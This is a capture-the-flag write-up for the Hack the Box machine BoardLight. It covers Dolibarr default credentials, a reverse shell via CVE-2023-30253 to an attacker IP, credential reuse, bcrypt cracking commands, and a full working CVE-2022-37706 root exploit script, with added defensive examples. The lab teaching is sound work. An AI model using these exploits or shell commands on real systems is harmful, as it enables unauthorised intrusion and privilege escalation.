BoardLight HTB
Linux BoardLight labs on Hack the Box.
We have access to a basic website. After some recon there is not much to exploit directly on it: the contact form is not wired to anything (it just sends a GET request), and the other user inputs are not vulnerable either.
We can do more reconnaissance on the web server. Nmap didn't give us anything useful, so we enumerate hidden directories and files with Gobuster. There are several ways to use Gobuster: enumerating directories, virtual hosts/subdomains, files with specific extensions, etc.
No results came out of this recon, so I went back to the website to look for more hints. A URL at the bottom of the page caught my attention. There was nothing of interest at the URL itself, but it gives us a domain name to run Gobuster's virtual-host enumeration against (after adding the domain to /etc/hosts).
We found a subdomain, crm.board.htb, which serves the login page of an administration panel (Dolibarr). A normal user should have no reason to be on this page. I tried basic credentials manually, and the default admin/admin pair logs us in without any registration. We land on a dashboard that is not linked to the target website, but it lets us create our own website through Dolibarr's website module. After some research, we found that the installed version, Dolibarr 17.0.0, is vulnerable.
There is a PoC for CVE-2023-30253 on GitHub. The bug: Dolibarr before 17.0.1 tried to keep PHP out of website pages by looking for a lowercase <?php opening tag, so an authenticated user with website-editing rights can get code execution simply by writing the tag as <?PHP instead.
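To make the root cause concrete, here is an added illustration (my own code, not Dolibarr's and not the PoC's) of a deny-list that only looks for a lowercase tag, next to a case-insensitive check of the kind the 17.0.1 fix introduced. The page sources are constructed samples.

```python
import re

# Constructed page sources an attacker might submit through the website module.
PAYLOAD_LOWER = '<p>hello</p><?php system("id"); ?>'     # caught by the naive check
PAYLOAD_UPPER = '<p>hello</p><?PHP system("id"); ?>'     # the CVE-2023-30253 trick
PAYLOAD_SHORT = '<p>hello</p><?= shell_exec("id") ?>'    # echo short tag, also PHP
XML_PROLOG = '<?xml version="1.0"?><p>no php here</p>'   # must NOT be flagged


def naive_contains_php(page_source: str) -> bool:
    """Illustrative weak check (not Dolibarr's code): exact lowercase tag only.

    PHP's parser does not care about the case of "php" in the opening tag,
    so anything this misses still executes once the page is rendered.
    """
    return "<?php" in page_source


def hardened_contains_php(page_source: str) -> bool:
    """Case-insensitive match on every PHP opening tag form.

    Matches "<?php" in any case, the echo short tag "<?=" and a bare "<?"
    followed by whitespace; "<?xml" is left alone.
    """
    return re.search(r"<\?(?:php\b|=|\s)", page_source, re.IGNORECASE) is not None


def bypasses_naive_filter(page_source: str) -> bool:
    """True when the page carries PHP that the naive deny-list would let through."""
    return hardened_contains_php(page_source) and not naive_contains_php(page_source)


if __name__ == "__main__":
    for name, src in [("lower", PAYLOAD_LOWER), ("upper", PAYLOAD_UPPER),
                      ("short", PAYLOAD_SHORT), ("xml", XML_PROLOG)]:
        print(f"{name:6} naive={naive_contains_php(src)!s:5} "
              f"hardened={hardened_contains_php(src)!s:5} "
              f"bypass={bypasses_naive_filter(src)}")
```

The wider lesson is that a deny-list over page source is fragile by construction (alternate openers, case, encoding tricks); the durable control is not to hand untrusted accounts a permission that amounts to "write PHP on the server" in the first place.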
To avoid Python dependency conflicts, I'll create a virtual environment (venv) for the project and run the exploit from it. Adapt the command to your target and to your attacker IP and port (start a listener on that port first), and it should work out of the box:

```
python3 exploit.py http://crm.board.htb admin admin 10.10.14.109 9001
```
This is why it's important to keep all your software versions up to date. We now have a shell on the system as www-data. It is a raw reverse shell rather than a proper TTY, so we upgrade it first:

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
```
Recon inside the web server starts now. We quickly find credentials in a conf.php file (Dolibarr's configuration file, which stores the database connection settings).
These credentials give us access to the MySQL database, where we find two bcrypt hashes (the $2y$ prefix) belonging to two users, Admin and SuperAdmin:

```
$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
```
I tried to crack these hashes (bcrypt is salted and deliberately slow, so there is nothing to "decrypt" and online lookup tables are useless) without any real success.
We already had the password "admin" for the Admin user, but it doesn't match any credentials on the system.
I tried the admin password for the user Larissa, and then the database password found in conf.php, and the latter worked: password reuse between the application and a system account. That's a good reminder to keep all the data from your recon and cross-reference every credential you've found against every account you know of.
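Before spending time on hashes it is worth reading what they actually are. This added helper (my own code, not part of the writeup or of Dolibarr) parses the two hashes found above in bcrypt's modular-crypt format and reports the cost factor, which tells you how slow a dictionary attack will be; the path and wordlist names in the suggested commands are assumptions.

```python
import re

# The two hashes pulled from the Dolibarr database, as shown above.
FOUND_HASHES = {
    "Admin": "$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96",
    "SuperAdmin": "$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm",
}

# $<variant>$<cost>$<22-char salt><31-char digest>, all in bcrypt's own base64 alphabet.
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)


def parse_bcrypt(mcf: str) -> dict:
    """Split a bcrypt modular-crypt string into its fields, validating the shape."""
    m = BCRYPT_RE.match(mcf)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    variant, cost_str, salt, digest = m.groups()
    cost = int(cost_str)
    if not 4 <= cost <= 31:
        raise ValueError(f"bcrypt cost {cost} out of range")
    return {
        "variant": variant,      # 2y is the PHP password_hash() flavour
        "cost": cost,
        "rounds": 2 ** cost,     # key-setup iterations per guess
        "salt": salt,            # 128-bit salt: no precomputed tables apply
        "digest": digest,
    }


def identify(found: dict) -> dict:
    """Map each user to the parsed fields of their hash."""
    return {user: parse_bcrypt(h) for user, h in found.items()}


def cracking_commands(hash_file: str = "hashes.txt",
                      wordlist: str = "/usr/share/wordlists/rockyou.txt") -> dict:
    """Offline dictionary attack invocations; file names are assumptions."""
    return {
        "hashcat": f"hashcat -m 3200 {hash_file} {wordlist}",          # 3200 = bcrypt
        "john": f"john --format=bcrypt --wordlist={wordlist} {hash_file}",
    }


if __name__ == "__main__":
    for user, info in identify(FOUND_HASHES).items():
        print(f"{user}: bcrypt {info['variant']} cost {info['cost']} "
              f"({info['rounds']} rounds), salt {info['salt']}")
    for tool, cmd in cracking_commands().items():
        print(f"{tool}: {cmd}")
```

Cost 10 means 1024 key-setup rounds per guess, so a large wordlist is slow even on a GPU; that is exactly why cross-referencing credentials you already hold (the conf.php password) pays off faster than brute force.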
We found the first user flag.
Now the goal is to gain root access. After running uname -r and researching the installed system, we quickly found that the box ships the Enlightenment window manager, whose SUID root helper enlightenment_sys has a well-known local privilege escalation, CVE-2022-37706 (a command injection through the mount path it builds). The public PoC worked out of the box as well. Operating systems, libraries, services, or anything linked to your product have to be kept up to date.
```bash
#!/bin/bash
# Public PoC for CVE-2022-37706 (Enlightenment enlightenment_sys SUID helper),
# as run on the box. The "[*]" markers were mangled by the page's markdown
# rendering and are restored here.

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

# The helper is installed SUID root; locate it wherever the distro put it.
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
    echo "[-] Couldn't find the vulnerable SUID file..."
    echo "[*] Enlightenment should be installed on your system."
    exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
# The directory name carries a ';' so that, when the helper pastes the path
# into the mount command line it runs, the shell treats /tmp/exploit as a
# second command, executed with the helper's root privileges.
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
```
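The bug class behind that PoC is easy to reproduce in miniature. This added demonstration (my own code, not the enlightenment_sys source) builds a mount command line from a caller-supplied path and hands it to the shell, then shows the fixed shape that passes an argument vector and never re-parses the path. A stand-in echo plays the part of mount, and the device path is constructed to carry the same ';' trick the PoC uses.

```python
import subprocess

# Constructed attacker input: a "device" whose name ends the mount command
# and starts a second one, exactly like "/dev/../tmp/;/tmp/exploit" above.
DEVICE = "/dev/../tmp/;echo INJECTED"
MOUNTPOINT = "/tmp/net"


def vulnerable_mount(device: str, mountpoint: str) -> str:
    """String concatenation plus shell=True: the path is re-parsed as shell syntax.

    Returns what the shell printed, so the injected command shows up as its
    own output line rather than as part of the mount arguments.
    """
    cmdline = f"echo mount {device} {mountpoint}"
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout


def hardened_mount(device: str, mountpoint: str) -> str:
    """argv list, no shell: ';' is just a byte inside one argument.

    Dropping privileges or validating the path is still required for a SUID
    helper, but at least the shell is no longer in the loop.
    """
    return subprocess.run(["echo", "mount", device, mountpoint],
                          capture_output=True, text=True).stdout


def injection_succeeded(output: str) -> bool:
    """True if INJECTED ran as a separate command (appears at the start of a line)."""
    return any(line.startswith("INJECTED") for line in output.splitlines())


if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_mount(DEVICE, MOUNTPOINT)))
    print("hardened:  ", repr(hardened_mount(DEVICE, MOUNTPOINT)))
```

Run it and the vulnerable path prints two lines, the second one being the injected command's output; the hardened path prints one line with the ';' sitting harmlessly inside the device argument.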
We got the root flag.
One last note: the shell the Dolibarr exploit hands back is a raw reverse shell, not a proper TTY, which makes some commands impossible to run (anything that needs a terminal, such as su or an editor). That is why we upgraded it with python3's pty.spawn and TERM=xterm right after landing as www-data.